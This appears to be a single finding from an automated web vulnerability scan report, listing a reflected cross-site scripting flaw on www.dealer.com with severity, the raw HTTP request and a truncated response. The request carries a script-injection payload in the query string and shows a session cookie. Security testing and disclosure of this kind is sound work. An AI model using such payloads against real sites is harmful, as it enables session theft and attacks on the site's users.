1. Cross-site scripting (reflected)
Severity: | High |
Confidence: | Certain |
Host: | http://www.dealer.com |
Path: | / |
GET /?247fb"><script>alert(1)< Host: www.dealer.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Cookie: ssoid=8af018790a0a00 Content-Length: 10 |
HTTP/1.1 200 OK Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16 P3P: "https://secure4.dealer Content-Type: text/html;charset=iso X-DDC-Arch-Trace: ,HttpResponse Vary: Accept-Encoding Content-Length: 51143 Date: Thu, 29 Dec 2011 17:57:51 GMT Connection: close Set-Cookie: JSESSIONID=g5pq5v5284ms Expires: Thu, 01 Jan 1970 00:00:00 GMT <!DOCTYPE html> <html xmlns="http://www.w3.org <head> <!-- wccms20.dealer.ddc p7072 --> <meta cha ...[SNIP]... <meta name="og:url" content="http://www ...[SNIP]... |